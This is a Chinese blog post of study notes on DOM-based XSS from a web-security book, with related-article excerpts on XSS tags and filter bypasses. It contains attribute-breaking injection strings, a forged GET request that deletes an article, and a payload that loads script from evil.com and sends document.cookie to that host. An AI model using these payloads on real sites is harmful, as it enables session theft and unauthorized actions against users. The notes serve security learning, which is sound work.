《白帽子讲Web安全》学习笔记01 XSS

最新推荐文章于 2023-11-05 09:14:10 发布
最新推荐文章于 2023-11-05 09:14:10 发布
阅读量218 收藏 2
点赞数 1
分类专栏: 学习笔记 文章标签: web XSS 攻击代码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45883223/article/details/107230443
版权

《白帽子讲Web安全》学习笔记01 XSS

DOM Based XSS

通过修改页面的DOM节点形成的XSS

<script>

function test(){
    var str=document.getElementById("text").value;
    document.getElementById("t").innerHTML = "<a href='"+str+"' >testLink</a>";
}

</script>

<div id="t"></div>
<input type="text" id="text" value=""/>
<input type="button" id="s" value="write" onclick="test()" />

点击write按钮后插入超链接地址是文本框的内容
按钮的onclick事件调用了test函数,中修改了页面的DOM节点,通过innerHTML把一段用户数据当作HTML写入页面中,造成了DOM Based XSS

有两种利用方式:
1.构造一个新事件

' onclick=alert(/xss/) //

页面代码就变成了:

<a href='' onclick=alert(/xss/)//' >testLink</a>

1)用一个单引号闭合掉href的第一个单引号
2)插入一个onclick事件
3)用//注释掉第二个单引号

2.闭合掉a标签,插入一个新的HTML标签。
输入

'><img src="#" οnerrοr=alert(/xss2/) /><'

页面代码就变成了:

<a href=''><img src="#" onerror=alert(/xss2/) /><'' >testLink</a>

恶意脚本被执行

XSS payload

窃取cookie

?abc="><script src="http://www.evil.com/evil.js ></script>
//evil.js
var img = document.createElement("img");
img.src = "http://www.evil.com/log?"+escape(document.cookie);
document.body.appendChild(img);

构造GET和POST请求

GET

js插入图片发起GET请求删除文章

var img = document.createElement("img");
img.src = "xxx?m=delete&id=xxx";
document.body.appendChild(img);
WustHandy
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
白帽子Web安全》读书笔记
冷却
04-04 1491
------ “安全问题的本质是信任的问题” 安全三要素:机密性、完整性、可用性 白帽子兵法:Secure By Default 原则(1:黑白单、白名单 2:最小权限原则)、纵深防御原则、数据与代码分离原则、不可预测性原则 “所有的程序本来也没有漏洞,只有功能,但当一些功能被用于破坏,造成损失时,也就成了漏洞。” 浏览器安全:同源策略、浏览器沙箱(备注:沙箱内的程序要与外界通信时是通过
白帽子web安全 完整版
03-12
白帽子Web安全》是一本深入探讨网络安全领域中Web应用安全的专业书籍,全面覆盖了Web安全的基础理论、常见威胁...通过对《白帽子Web安全》的学习,我们可以提高对Web应用安全的认识,更好地保护网络世界的安全
xss漏洞的一些思考
qq_42383069的博客
07-14 804
xss漏洞实战
XSS常见的触发标签
LYJ20010728的博客
05-06 1万+
无过滤情况 <script> <scirpt>alert("xss");</script> <img> 图片加载错误时触发 <img src="x" onerror=alert(1)> <img src="1" onerror=eval("alert('xss')")> 鼠标指针移动到元素时触发 <img src=1 onmouseover="alert(1)"> 鼠标指针移出时触发 <img src=1 onm
XSS(href输出,js输出)防范措施
qq_43814486的博客
05-05 8924
防御总的原则:根据实际情况对输入做过滤,对输出做转义 href输出漏洞:输出出现在a标签的href属性里面,可以使用javascript协议来执行js 后端: $message=htmlspecialchars($_GET['message'],ENT_QUOTES); $html.="<a href='{$message}'> 可以看到,虽然对htmlspecialchars()...
XSS攻击
KISS
02-10 1257
XSS攻击的介绍 在开始本文之前,我们先提出一个问题,请判断以下两个说法是否正确: XSS 防范是后端 RD(研发人员)的责任,后端 RD 应该在所有用户提交数据的接口,对敏感字符进行转义,才能进行下一步操作。 所有要插入到页面上的数据,都要通过一个敏感字符过滤函数的转义,过滤掉通用的敏感字符后,就可以插入到页面中。 如果你还不能确定答案,那么可以带着这些问题向下看,我们将逐步拆解问题...
XSS(跨站脚本攻击)详解
hello
07-02 3843
XSS简述-XSS类型-XSS常用标签
白帽子Web安全(1).zip
08-06
综上所述,《白帽子Web安全》是一本全面且深入的Web安全指南,适合网络安全从业者、开发人员以及对此领域感兴趣的人士阅读学习。通过本书,读者不仅可以了解Web安全的各个方面,还能掌握实际操作中的防护技巧,...
白帽子web安全
03-02
通过阅读《白帽子Web安全》,无论是初入行业的新人还是有经验的安全专家,都能从中受益,提升对Web安全的理解,学习到有效的防御策略,从而更好地保护网络环境。无论你是开发者、安全管理员还是对网络安全感兴趣的...
XSS笔记
qq_52105695的博客
01-24 181
XSS笔记–暂时 有提交框,get传参,可以在HTML页面看见回显 1攻击流程 1先提随便几个参数交看哪里可以得到回显 2跟据参数位置判断闭合方式在写入<script>alert(1)</script> 3查看源码看提交后语句在HTML中的样子来判断字符如何被过滤 4然后在根据过滤写入新的语句 2<>没被过滤标签的使用 1.<script> 在页面中插入一段JavaScript,可以引用外部的JavaScript代码,也可以将代码插入脚本标记中。HTML代码
XSS绕过经验总结
sli_ant的博客
07-06 4677
XSS绕过经验总结 1.概述 做过不少渗透测试,发现系统中有各式各样的拦截XSS的机制,这边分享一下绕过XSS的经验。 刚开始学习XSS时,可能一开始的攻击方式是将payload整理成字典,然后一个个尝试,或者是放到burpsuite中进行爆破,这个是非常直接而且挺有效果的方式,但是如果防御机制是直接将特殊字符进行转义时,可能这个效果就会比较差,因此我这里分享的经验时逐步进行分析的流程。 XSS攻击的流程: 1.观察输入的数据是否在页面有回显 2.判断XSS防御机制 3.构造XSSpayload 4.触发X
XSS测试之闭合的正确使用方式
u014171100的博客
12-16 5085
在测试XSS漏洞的时,不少同鞋会从大量Payload中随便挑选几个顺眼来尝试,没有弹窗就放弃了,这种方法并不是很科学,一些稍微隐秘点的XSS基本都能逃过这样的检查。下面我将从XSS的本质起,给各位分享一下我的XSS测试方法。 XSS属于注入类漏洞,其本质是:在前端代码中用户可以控制内容的地方(简称可控点),拼接上一段可被浏览器执行的新语句。这里可被浏览器执行是关键,不管你正在测试的点是否有漏洞,首先拼接上去的脚本同上下文看来,需要一定程度的符合前端代码的语法结构。 ...
2.xss
weixin_41826065的博客
12-07 1359
XSS
XSS 常用标签及绕过姿势总结
hackzkaq的博客
08-17 5496
A位置可填充 /,/123/,%09,%0A,%0C,%0D,%20 B位置可填充 %09,%0A,%0C,%0D,%20 C位置可填充 %0B,/**/,如果加了双引号,则可以填充 %09,%0A,%0C,%0D,%20 D位置可填充 %09,%0A,%0C,%0D,%20,//,>例如 javascript:alert(1) ,进行 Unicode 编码时,只能对 alert 和 “1” 进行编码,框号编码后会被当成文本字符,不能执行。...
XSS漏洞-常见标签
weixin_61143354的博客
09-17 1580
网络安全笔记
JS跨站脚本攻击XSS
jack_shuai的博客
05-08 1027
XSS简介 跨站脚本攻击(Cross Site Script为了区别于CSS简称为XSS)指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。 Java后台解决办法 ...
xss闭合标签用法
最新发布
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
11-05 432
div1
Web安全XSS漏洞的测试(防止 黑客利用此漏洞.)
热门推荐
网络安全领域___专研者.
03-17 1万+
XSS漏洞的概括: XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其中JS代码就会被执行,从而达到攻击的目的.(包含:收集用户的Cookie,添加账号,修改密码,提高用户权限等等.)
白帽子web安全 电子书
10-17
它由白帽子(指网络安全领域的道德黑客)撰写,旨在帮助读者了解并学习有关web安全的知识。 书中首先介绍了web安全的概念和重要性,解释了黑客的攻击方法和技术。接着,书中详细解了常见的web安全漏洞,如跨站...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值